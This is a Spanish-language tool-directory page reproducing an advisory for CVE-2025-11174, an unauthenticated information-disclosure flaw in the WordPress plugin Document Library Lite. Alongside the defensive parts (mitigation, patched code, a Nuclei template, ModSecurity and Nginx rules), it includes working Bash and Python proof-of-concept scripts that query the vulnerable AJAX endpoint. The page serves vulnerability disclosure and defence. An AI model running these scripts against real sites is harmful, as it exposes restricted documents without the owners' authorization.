Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Falta de autorización para la exposición de información sensible | CVE-2025-11174 | Kitploit
Herramientas/GitHubGitHub/snailsploit/cve-2025-11174
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Falta de autorización para la exposición de información sensible | CVE-2025-11174

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-11174: Divulgación de Información no Autenticada en el Plugin Document Library Lite de WordPress

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

Palabras clave: CVE-2025-11174, vulnerabilidad de Document Library Lite, divulgación de información, seguridad de WordPress, exploit AJAX no autenticado, vulnerabilidad de plugin de WordPress, CWE-862, seguridad de plugin de documentos de WordPress, bypass de autorización, WordPress CVE 2025

Tabla de Contenido

  • Visión general
  • Detalles de la Vulnerabilidad
  • Análisis Técnico
  • Vector de Ataque
  • Prueba de Concepto
  • Guía de Mitigación
  • Detección
  • Métricas CVSS
  • Referencias
  • Créditos
  • Contacto de Seguridad

Visión general

Vulnerabilidad de Divulgación de Información en el Plugin Document Library Lite de WordPress (CVE-2025-11174) - Fallo de seguridad que permite acceso no autenticado a datos sensibles de documentos en el plugin de biblioteca de documentos de WordPress.

Se descubrió una vulnerabilidad crítica de bypass de autorización en el Plugin Document Library Lite de WordPress que permite a atacantes no autenticados acceder a información sensible de documentos sin la autenticación adecuada.

Descubierto por: Kai Aizen y Avraham Shemesh (SnailSploit)
Publicado: 1 de noviembre de 2025
Puntuación CVSS: 5.3 (Medio)
CWE: CWE-862 - Autorización Faltante
Plugin: Document Library Lite
Vendedor: Barn2 Plugins
Tipo de Ataque: Divulgación de Información no Autenticada
Privilegios Requeridos: Ninguno (Ataque no Autenticado)

Detalles de la Vulnerabilidad

Descripción

El plugin Document Library Lite para WordPress contiene una vulnerabilidad de autorización incorrecta en todas las versiones hasta la 1.1.6 inclusive. El plugin expone una acción AJAX no autenticada dll_load_posts que devuelve una tabla JSON de datos de documentos sin realizar comprobaciones de nonce o capacidades.

Impacto

Esta vulnerabilidad permite a atacantes no autenticados:

  • Acceder a metadatos de documentos sin autorización
  • Recuperar listados de documentos que deberían estar restringidos
  • Ver información de documentos destinada solo a usuarios autenticados
  • Enumerar documentos almacenados en la Biblioteca de Documentos

Nota: La puntuación CVSS de 5.3 (severidad Media) refleja una divulgación limitada de información. Si bien la vulnerabilidad permite el acceso no autenticado a datos de documentos, el impacto se califica como Bajo en confidencialidad sin impacto en integridad ni disponibilidad.

Versiones Afectadas

  • Vulnerable: Todas las versiones ≤ 1.1.6
  • Parcheada: Versión 1.1.7 y superiores

Métricas CVSS v3.1

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Desglose CVSS v3.1:

  • Vector de Ataque (AV): Red - La vulnerabilidad puede explotarse de forma remota a través de una red
  • Complejidad del Ataque (AC): Baja - No se requieren condiciones especiales para la explotación
  • Privilegios Requeridos (PR): Ninguno - No se requiere autenticación ni privilegios
  • Interacción del Usuario (UI): Ninguna - El exploit funciona sin interacción del usuario
  • Alcance (S): Sin cambios - La vulnerabilidad solo afecta al componente vulnerable
  • Impacto en Confidencialidad (C): Bajo - Divulgación limitada de información
  • Impacto en Integridad (I): Ninguno - Sin impacto en integridad
  • Impacto en Disponibilidad (A): Ninguno - Sin impacto en disponibilidad

Análisis Técnico

Causa Raíz de la Vulnerabilidad

La acción AJAX dll_load_posts está registrada sin las comprobaciones adecuadas de autenticación o autorización:

root@kitploit:~
// Código vulnerable (simplificado)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

El prefijo wp_ajax_nopriv_ indica que esta acción es accesible para usuarios no autenticados, y la función callback no implementa:

  • Verificación de nonce
  • Comprobaciones de capacidades
  • Validación de autenticación de usuario

Vector de Ataque

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=dll_load_posts

La vulnerabilidad puede explotarse a través del endpoint admin-ajax.php de WordPress sin autenticación.

Prueba de Concepto

⚠️ Solo con Fines Educativos y de Pruebas Autorizadas

PoC en Bash

root@kitploit:~
#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"

PoC en Python

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

Mitigación

Para Administradores del Sitio

Acción Inmediata Requerida:

  1. Actualice a la versión 1.1.7 o superior de Document Library Lite de inmediato
  2. Revise los registros de acceso de su sitio en busca de solicitudes POST sospechosas a admin-ajax.php con action=dll_load_posts
  3. Si no puede actualizar de inmediato, considere desactivar temporalmente el plugin

Instrucciones de Actualización

A través del Admin de WordPress:

  1. Navegue a Plugins > Plugins Instalados en el admin de WordPress
  2. Localice "Document Library Lite"
  3. Haga clic en Actualizar Ahora para actualizar a la versión 1.1.7 o superior
  4. Verifique que la actualización fue exitosa

Usando WP-CLI:

root@kitploit:~
wp plugin update document-library-lite

Para Desarrolladores de Plugins

Asegúrese de que todos los manejadores AJAX implementen controles de seguridad adecuados:

root@kitploit:~
// Ejemplo de seguridad AJAX correcta
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');

function dll_load_posts_callback() {
    // Verificar nonce
    if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
        wp_die('Nonce inválido');
    }
    
    // Comprobar capacidades
    if (!current_user_can('read')) {
        wp_send_json_error('Permisos insuficientes');
        wp_die();
    }
    
    // Su código seguro aquí
}

Detección

Verificación del Plugin de WordPress

root@kitploit:~
# Comprobar si está instalada una versión vulnerable
wp plugin list | grep -i "document-library-lite"

Reglas para Escáner de Seguridad

Plantilla Nuclei:

root@kitploit:~
id: CVE-2025-11174

info:
  name: Document Library Lite - Unauthenticated Information Disclosure
  author: security-research
  severity: medium
  description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    body: "action=dll_load_posts"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
      
      - type: status
        status:
          - 200

Reglas para Firewall de Aplicaciones Web

Regla ModSecurity:

root@kitploit:~
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
    "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
    log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
    SecRule ARGS:action "@streq dll_load_posts" "t:none"

Regla Nginx/OpenResty:

root@kitploit:~
if ($request_uri ~* "admin-ajax\.php") {
    if ($args ~* "action=dll_load_posts") {
        return 403;
    }
}

Cronología

  • 1 de noviembre de 2025 - Vulnerabilidad divulgada públicamente
  • 1 de noviembre de 2025 - Registro CVE publicado
  • Noviembre 2025 - Parche lanzado (versión 1.1.7)

Referencias

  • CVE-2025-11174 - CVE.org
  • Base de Datos de Asesorías de GitHub
  • Wordfence Intelligence
  • Directorio de Plugins de WordPress

Créditos

Investigadores:

  • Avraham Shemesh
  • Kai Aizen - SnailSploit

Proceso de Divulgación: Divulgación coordinada

Descargo de Responsabilidad

Esta información se proporciona únicamente con fines de investigación de seguridad y defensa. Cualquier explotación de esta vulnerabilidad con fines maliciosos es ilegal y poco ética. Siempre obtenga la autorización adecuada antes de probar sistemas que no le pertenecen.

Contacto

Para preguntas o información adicional sobre esta vulnerabilidad:

  • Correo electrónico: [email protected]
  • Sitio web: snailsploit.com
  • Organización: SnailSploit Security Research

Última actualización: 2 de noviembre de 2025


📚 Documentación y Autor

El artículo completo, la metodología y las investigaciones relacionadas de este proyecto se encuentran en:

https://snailsploit.com/security-research/cves/cve-2025-11174/

Creado por Kai Aizen — investigador independiente de seguridad ofensiva.

snailsploit.com · Investigación · Marcos de trabajo · GitHub · LinkedIn · ResearchGate · X/Twitter

Mismo ataque. Sustrato diferente.

Descargar herramienta
MétricaValor
Vector de AtaqueRed (AV:N)
Complejidad del AtaqueBaja (AC:L)
Privilegios RequeridosNinguno (PR:N)
Interacción del UsuarioNinguna (UI:N)
AlcanceSin cambios (S:U)
ConfidencialidadBaja (C:L)
IntegridadNinguna (I:N)
DisponibilidadNinguna (A:N)